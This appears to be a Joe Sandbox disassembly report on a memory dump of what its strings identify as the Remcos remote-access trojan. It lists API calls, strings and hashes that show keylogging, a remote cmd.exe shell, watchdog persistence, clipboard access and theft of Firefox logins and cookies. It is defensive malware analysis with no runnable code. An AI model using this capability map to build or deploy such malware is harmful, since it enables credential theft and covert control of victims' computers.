                                                                  • Opcode ID: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
                                                                  • Instruction ID: 06324504dbe977c901379e35fefec32dabdef79d564ed510376fbe661015aea4
                                                                  • Opcode Fuzzy Hash: 446cd1a75fef60d2dbb194a89db87c245147481f39af62d49fc0052fbde1f552
                                                                  • Instruction Fuzzy Hash: FFD02B723001213B9310AB5DAC01FB76B9CDFD27227050037F409C3110D7948D4147AD
                                                                  APIs
                                                                  • _wcslen.LIBCMT ref: 00408F39
                                                                    • Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,00409305,?,00000000,00000000), ref: 0040928B
                                                                    • Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,004092EF,?,00000000,00000000), ref: 0040929B
                                                                    • Part of subcall function 00409203: CreateThread.KERNEL32(00000000,00000000,Function_00009311,?,00000000,00000000), ref: 004092A7
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CreateThread$_wcslen
                                                                  • String ID:
                                                                  • API String ID: 1119755333-0
                                                                  • Opcode ID: a4cf6233b645aec8069e012e89874406b6158c7e2554cf9ff51d1662effb5250
                                                                  • Instruction ID: bde1965b6f08766bd400bb9d626b3f4fd5e121562736213e95ba31f4244dc5e2
                                                                  • Opcode Fuzzy Hash: a4cf6233b645aec8069e012e89874406b6158c7e2554cf9ff51d1662effb5250
                                                                  • Instruction Fuzzy Hash: 86218F719040899ACB09FFB5DD528EE7BB5AE51308F00003FF941722E2DE785A49DA99
                                                                  APIs
                                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 00404893
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Startup
                                                                  • String ID:
                                                                  • API String ID: 724789610-0
                                                                  • Opcode ID: a39f64238678d40d2918f9ecd5b136492fe542bf64fe6c2875bf53ab9f510d38
                                                                  • Instruction ID: a9c8eddc0db4f5dff40e6a71866b0cfb015b1534c728beba927ba249e589f683
                                                                  • Opcode Fuzzy Hash: a39f64238678d40d2918f9ecd5b136492fe542bf64fe6c2875bf53ab9f510d38
                                                                  • Instruction Fuzzy Hash: C2D0123255860C4ED610ABB4AD0F8A5775CC313A16F4003BAACB9835D3F640571CC2AB
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: send
                                                                  • String ID:
                                                                  • API String ID: 2809346765-0
                                                                  • Opcode ID: 01e24c4520a6d3c4395155137d096ef59c3bb50acc7407598b25046a660799bf
                                                                  • Instruction ID: 7b6f63586de962cf13c642be8f044126cb3c52731424b67aaf056de8313b57d0
                                                                  • Opcode Fuzzy Hash: 01e24c4520a6d3c4395155137d096ef59c3bb50acc7407598b25046a660799bf
                                                                  • Instruction Fuzzy Hash: 41B092B9108302BFCA160B60CC0887A7EA6ABC8786B00882CF546421B0C636C460AB2A
                                                                  APIs
                                                                  • GetCurrentProcessId.KERNEL32 ref: 00410B6B
                                                                    • Part of subcall function 00412268: RegCreateKeyA.ADVAPI32(80000001,00000000,P0F), ref: 00412276
                                                                    • Part of subcall function 00412268: RegSetValueExA.ADVAPI32(P0F,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 00412291
                                                                    • Part of subcall function 00412268: RegCloseKey.ADVAPI32(?,?,?,?,0040B093,004638E0,00000001,000000AF,00463050), ref: 0041229C
                                                                  • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410BAB
                                                                  • CloseHandle.KERNEL32(00000000), ref: 00410BBA
                                                                  • CreateThread.KERNEL32(00000000,00000000,00411253,00000000,00000000,00000000), ref: 00410C10
                                                                  • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 00410E7F
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseCreateOpenProcess$CurrentHandleMutexThreadValue
                                                                  • String ID: (#G$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$!G
                                                                  • API String ID: 3018269243-1736093966
                                                                  • Opcode ID: 663b53c9886a84878b2c7f244d1e88e20c598910774a7e7b077661fc57b6424a
                                                                  • Instruction ID: e4f63523a9081b51a3adb9d06d528b7104d503695ba60a117a14e5ebfa22ea95
                                                                  • Opcode Fuzzy Hash: 663b53c9886a84878b2c7f244d1e88e20c598910774a7e7b077661fc57b6424a
                                                                  • Instruction Fuzzy Hash: DD71923160430167C604FB62DD67DAE73A8AE91308F50097FF546621E2EEBC9E49C69F
                                                                  APIs
                                                                  • SetEvent.KERNEL32(?,?), ref: 00406D4A
                                                                  • GetFileAttributesW.KERNEL32(00000000,00000000,?), ref: 00406E18
                                                                  • DeleteFileW.KERNEL32(00000000), ref: 00406E3A
                                                                    • Part of subcall function 0041A01B: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
                                                                    • Part of subcall function 0041A01B: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
                                                                    • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB
                                                                    • Part of subcall function 0041A01B: FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
                                                                    • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                    • Part of subcall function 00404A81: WaitForSingleObject.KERNEL32(?,00000000,0040545D,?,?,00000004,?,?,00000004,?,00471E90,?), ref: 00404B27
                                                                    • Part of subcall function 00404A81: SetEvent.KERNEL32(?,?,?,00000004,?,?,00000004,?,00471E90,?,?,?,?,?,?,0040545D), ref: 00404B55
                                                                  • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407228
                                                                  • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 00407309
                                                                  • DeleteFileA.KERNEL32(?), ref: 0040768E
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: File$Find$DeleteDirectoryEventRemove$AttributesCloseDriveExecuteFirstLocalLogicalNextObjectShellSingleStringsTimeWaitsend
                                                                  • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $Unable to delete: $Unable to rename file!$open
                                                                  • API String ID: 1385304114-1507758755
                                                                  • Opcode ID: c278ba482b9b12ba4cb3465885cb620193a7144f06c216f2c0bcdf15f2f3753d
                                                                  • Instruction ID: 48d75f04ed6415a86b5419c4bbb4b80b443badeb9edbc79095c7941e671ccbd4
                                                                  • Opcode Fuzzy Hash: c278ba482b9b12ba4cb3465885cb620193a7144f06c216f2c0bcdf15f2f3753d
                                                                  • Instruction Fuzzy Hash: EE42A771A043005BC604FB76C86B9AE77A9AF91304F40493FF542671E2EE7D9A09C79B
                                                                  APIs
                                                                  • __Init_thread_footer.LIBCMT ref: 004056C6
                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                  • __Init_thread_footer.LIBCMT ref: 00405703
                                                                  • CreatePipe.KERNEL32(00473BB4,00473B9C,00473AC0,00000000,00463068,00000000), ref: 00405796
                                                                  • CreatePipe.KERNEL32(00473BA0,00473BBC,00473AC0,00000000), ref: 004057AC
                                                                  • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00473AD0,00473BA4), ref: 0040581F
                                                                  • Sleep.KERNEL32(0000012C,00000093,?), ref: 00405877
                                                                  • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0040589C
                                                                  • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 004058C9
                                                                    • Part of subcall function 00432525: __onexit.LIBCMT ref: 0043252B
                                                                  • WriteFile.KERNEL32(00000000,00000000,?,00000000,00471F28,0046306C,00000062,00463050), ref: 004059C4
                                                                  • Sleep.KERNEL32(00000064,00000062,00463050), ref: 004059DE
                                                                  • TerminateProcess.KERNEL32(00000000), ref: 004059F7
                                                                  • CloseHandle.KERNEL32 ref: 00405A03
                                                                  • CloseHandle.KERNEL32 ref: 00405A0B
                                                                  • CloseHandle.KERNEL32 ref: 00405A1D
                                                                  • CloseHandle.KERNEL32 ref: 00405A25
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: CloseHandle$CreatePipe$FileInit_thread_footerProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                  • String ID: SystemDrive$cmd.exe
                                                                  • API String ID: 2994406822-3633465311
                                                                  • Opcode ID: 203e44911a43dcd92d82ef9baefe2184337315f49ac2ee985c3da8590b249be6
                                                                  • Instruction ID: 60b94bd4732a7a61eda53217d638a5a8398e5d64ba0573e0a23605d008395794
                                                                  • Opcode Fuzzy Hash: 203e44911a43dcd92d82ef9baefe2184337315f49ac2ee985c3da8590b249be6
                                                                  • Instruction Fuzzy Hash: 2991D571600204AFC710BF65AC52D6F3698EB44745F00443FF949A72E3DA7CAE489B6E
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040AAF0
                                                                  • FindClose.KERNEL32(00000000), ref: 0040AB0A
                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040AC2D
                                                                  • FindClose.KERNEL32(00000000), ref: 0040AC53
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$CloseFile$FirstNext
                                                                  • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                                                  • API String ID: 1164774033-3681987949
                                                                  • Opcode ID: c4a8a3561dda33a316002e905d5158176c4bb62f60b9ed2c5276f134ba47fa8b
                                                                  • Instruction ID: fcfcc6101c27069c9b98dcbc284c26b589152974821445ccf2a2d41a2abcc6ea
                                                                  • Opcode Fuzzy Hash: c4a8a3561dda33a316002e905d5158176c4bb62f60b9ed2c5276f134ba47fa8b
                                                                  • Instruction Fuzzy Hash: DD516C7190021A9ADB14FBB1DC96EEEB738AF10309F50057FF406720E2FF785A458A5A
                                                                  APIs
                                                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040ACF0
                                                                  • FindClose.KERNEL32(00000000), ref: 0040AD0A
                                                                  • FindNextFileA.KERNEL32(00000000,?), ref: 0040ADCA
                                                                  • FindClose.KERNEL32(00000000), ref: 0040ADF0
                                                                  • FindClose.KERNEL32(00000000), ref: 0040AE11
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$Close$File$FirstNext
                                                                  • String ID: [Firefox Cookies not found]$[Firefox cookies found, cleared!]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                  • API String ID: 3527384056-432212279
                                                                  • Opcode ID: 3b5b8b69b03ca4378a7fc1b44b4c034fda2df619af0ad02dc3fa9ed3aead64ba
                                                                  • Instruction ID: fb37dd61a783c7e48c67abb1194b5e9e6d585cff7aa156a37ad31c809035e36e
                                                                  • Opcode Fuzzy Hash: 3b5b8b69b03ca4378a7fc1b44b4c034fda2df619af0ad02dc3fa9ed3aead64ba
                                                                  • Instruction Fuzzy Hash: 33417E7190021A5ACB14FBB1DC56DEEB729AF11306F50057FF402B21D2EF789A468A9E
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A076
                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0A6
                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00472200,00000001), ref: 0041A118
                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A125
                                                                    • Part of subcall function 0041A01B: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00472200,00000001), ref: 0041A0FB
                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,00472200,00000001), ref: 0041A146
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A15C
                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A163
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,00472200,00000001), ref: 0041A16C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                  • String ID: 05ou`ou$pth_unenc
                                                                  • API String ID: 2341273852-1753207049
                                                                  • Opcode ID: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
                                                                  • Instruction ID: c5fafce0dbccb0860899da49af80cd87a4a733faaf08891c553187227cdc222a
                                                                  • Opcode Fuzzy Hash: 6646849479acfbb23c7f6e30dece2f39408b91799c0e2f504d1e8212b579ce47
                                                                  • Instruction Fuzzy Hash: 5F31937290121C6ADB20EBA0DC49EDB77BCAB08305F4406FBF558D3152EB39DAD48A19
                                                                  APIs
                                                                  • OpenClipboard.USER32 ref: 00414EC2
                                                                  • EmptyClipboard.USER32 ref: 00414ED0
                                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 00414EF0
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00414EF9
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00414F2F
                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00414F38
                                                                  • CloseClipboard.USER32 ref: 00414F55
                                                                  • OpenClipboard.USER32 ref: 00414F5C
                                                                  • GetClipboardData.USER32(0000000D), ref: 00414F6C
                                                                  • GlobalLock.KERNEL32(00000000), ref: 00414F75
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00414F7E
                                                                  • CloseClipboard.USER32 ref: 00414F84
                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                  • String ID:
                                                                  • API String ID: 3520204547-0
                                                                  • Opcode ID: 3e1616ad11adebc6658c68cf8d8c69f9fd655134579bc9701aa075f92177f950
                                                                  • Instruction ID: 88f859f6ed4527f0268ca0f0dcff7fecf11b3a85ebb64268ee3e6238e9d0ca75
                                                                  • Opcode Fuzzy Hash: 3e1616ad11adebc6658c68cf8d8c69f9fd655134579bc9701aa075f92177f950
                                                                  • Instruction Fuzzy Hash: C32162312043009BD714BF71DC5A9BE76A8AF90746F81093EF906931E3EF3889458A6A
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 0$1$2$3$4$5$6$7
                                                                  • API String ID: 0-3177665633
                                                                  • Opcode ID: 05f2545c527969495595f266b9e9e19f26da2af4dc4ec233c9d36f06689b886f
                                                                  • Instruction ID: 7e6592d3055df16b324e67483fbf58bd1f951358f7384255f7d9d01b5e43b049
                                                                  • Opcode Fuzzy Hash: 05f2545c527969495595f266b9e9e19f26da2af4dc4ec233c9d36f06689b886f
                                                                  • Instruction Fuzzy Hash: 7661D4709183019ED704EF21D8A1FAB7BB4DF94310F10881FF5A25B2D1DA789A49CBA6
                                                                  APIs
                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 00418714
                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00418763
                                                                  • GetLastError.KERNEL32 ref: 00418771
                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 004187A9
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                  • String ID:
                                                                  • API String ID: 3587775597-0
                                                                  • Opcode ID: 567a02d3676939b60cead921024e5a933565feb35c1b84cad879b30dce2cf72b
                                                                  • Instruction ID: 6ce88c058296d2c3b0169cbae3b24baff62e3479be35c2318cb4853598c639b3
                                                                  • Opcode Fuzzy Hash: 567a02d3676939b60cead921024e5a933565feb35c1b84cad879b30dce2cf72b
                                                                  • Instruction Fuzzy Hash: 04814071104344ABC304FB62DC959AFB7E8FF94708F50092EF58552192EE78EA49CB9A
                                                                  APIs
                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004727F8), ref: 048F94AC
                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 048F94FB
                                                                  • GetLastError.KERNEL32 ref: 048F9509
                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 048F9541
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                  • String ID:
                                                                  • API String ID: 3587775597-0
                                                                  • Opcode ID: 049e9c4a4994cd58cca1601baf77f2d4cdbca623a01cdd536f5bac171392d326
                                                                  • Instruction ID: b6aeafb508a3f45204c883f4dc95de394636e9c1784cfd3edbdaedaf90c31478
                                                                  • Opcode Fuzzy Hash: 049e9c4a4994cd58cca1601baf77f2d4cdbca623a01cdd536f5bac171392d326
                                                                  • Instruction Fuzzy Hash: A2816D71504345ABD304EF26C894DAFB7A8EF95618F504E2DF98583190EFB4FA09CB52
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(00000000,?,\Mozilla\Firefox\Profiles\,00000000), ref: 0040B2DC
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0040B3AF
                                                                  • FindClose.KERNEL32(00000000), ref: 0040B3BE
                                                                  • FindClose.KERNEL32(00000000), ref: 0040B3E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$CloseFile$FirstNext
                                                                  • String ID: AppData$\Mozilla\Firefox\Profiles\$\cookies.sqlite
                                                                  • API String ID: 1164774033-405221262
                                                                  • Opcode ID: 0a9536b98050fe6475af2145f6314896d627c54caaf148ea488075094c15e0f3
                                                                  • Instruction ID: 883258bb694cc85cc249d311a8318fbda55549897f82b44e5d780b3967986c9e
                                                                  • Opcode Fuzzy Hash: 0a9536b98050fe6475af2145f6314896d627c54caaf148ea488075094c15e0f3
                                                                  • Instruction Fuzzy Hash: 7D31533190025996CB14FBA1DC9ADEE7778AF50718F10017FF405B21D2EFBC9A4A8A8D
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 0040935B
                                                                  • SetWindowsHookExA.USER32(0000000D,0040932C,00000000), ref: 00409369
                                                                  • GetLastError.KERNEL32 ref: 00409375
                                                                    • Part of subcall function 004194DA: GetLocalTime.KERNEL32(00000000), ref: 004194F4
                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004093C3
                                                                  • TranslateMessage.USER32(?), ref: 004093D2
                                                                  • DispatchMessageA.USER32(?), ref: 004093DD
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                  • String ID: Keylogger initialization failure: error $`ou
                                                                  • API String ID: 3219506041-93350570
                                                                  • Opcode ID: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
                                                                  • Instruction ID: 7386389ed158dc1e9b291cee6df9fe5cdc6a320468782ebba6dd7d831fd8f91b
                                                                  • Opcode Fuzzy Hash: fdc0b474fe1aff0b22fd9a46203375ee37c9d39229ef2232f764eb0bd3d466e4
                                                                  • Instruction Fuzzy Hash: 4D119431604301ABC7107B769D0985BB7ECEB99712B500A7EFC95D32D2EB74C900CB6A
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 048E953D
                                                                  • FindFirstFileW.KERNEL32(00000000,?,00000000,00000000,?), ref: 048E95B5
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 048E95DE
                                                                  • FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 048E95F5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseFirstH_prologNext
                                                                  • String ID: p2oup3ou 2ou$OE
                                                                  • API String ID: 1157919129-1943713240
                                                                  • Opcode ID: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                                                                  • Instruction ID: 7db7a6cd3d58ef240dc0925299ef3042fae777b3e96e06a880db5949ff96f4e6
                                                                  • Opcode Fuzzy Hash: 723ee23fa97bb8f6af8cca5773ea7e68c839743d70c3dbe8a8860bd87f8337b2
                                                                  • Instruction Fuzzy Hash: B78181729001199BDB15FBAACC509FD7778AF16218F104BAAD806E70A0EFB47B49CB51
                                                                  APIs
                                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129B8
                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 004129C4
                                                                    • Part of subcall function 00404A81: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B16
                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 00412CBA
                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00412CC1
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                  • API String ID: 2127411465-314212984
                                                                  • Opcode ID: f82792b3401e08ff186b5e00bd96b5b3681df82aef6ecc181a20678d603cf078
                                                                  • Instruction ID: 16181ac17c5890234a95f9c719cc05f83ad3eef33587bd03cd2ae8bf1541d7ce
                                                                  • Opcode Fuzzy Hash: f82792b3401e08ff186b5e00bd96b5b3681df82aef6ecc181a20678d603cf078
                                                                  • Instruction Fuzzy Hash: CCE1DA72A0430067CA14B776DD57DAF36A8AF91318F40053FF946F71E2EDBD8A44829A
                                                                  APIs
                                                                  • _free.LIBCMT ref: 00446741
                                                                  • _free.LIBCMT ref: 00446765
                                                                  • _free.LIBCMT ref: 004468EC
                                                                  • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,0045C1E4), ref: 004468FE
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F754,000000FF,00000000,0000003F,00000000,?,?), ref: 00446976
                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,0046F7A8,000000FF,?,0000003F,00000000,?), ref: 004469A3
                                                                  • _free.LIBCMT ref: 00446AB8
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3761745224.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_400000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                  • String ID:
                                                                  • API String ID: 314583886-0
                                                                  • Opcode ID: a5da58bbeb6be53a23860ab05d43a3c9aafa13e1177cfd3d02c48c8adf0a5ff3
                                                                  • Instruction ID: 8b87e38212d70e432f0d45c21c10c2da0ad9042405ab808e013634feac4ff008
                                                                  • Opcode Fuzzy Hash: a5da58bbeb6be53a23860ab05d43a3c9aafa13e1177cfd3d02c48c8adf0a5ff3
                                                                  • Instruction Fuzzy Hash: 67C15CB1900245ABFB24AF79DC41AAA7BB8EF03314F16416FE48497341EB788E45C75E
                                                                  APIs
                                                                  • __EH_prolog.LIBCMT ref: 048E85E5
                                                                  • FindFirstFileW.KERNEL32(00000000,?,004632A8,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 048E869E
                                                                  • __CxxThrowException@8.LIBVCRUNTIME ref: 048E86C6
                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 048E86D3
                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 048E87E9
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.3762836955.00000000048E0000.00000040.00000400.00020000.00000000.sdmp, Offset: 048E0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_48e0000_SndVol.jbxd
                                                                  Yara matches
                                                                  Similarity
                                                                  • API ID: Find$File$CloseException@8FirstH_prologNextThrow
                                                                  • String ID: p2oup3ou 2ou
                                                                  • API String ID: 1771804793-232651861
                                                                  • Opcode ID: d2b2406fb78086a357800fb68e00157406e6bc822482aaceecce54b7553cb521
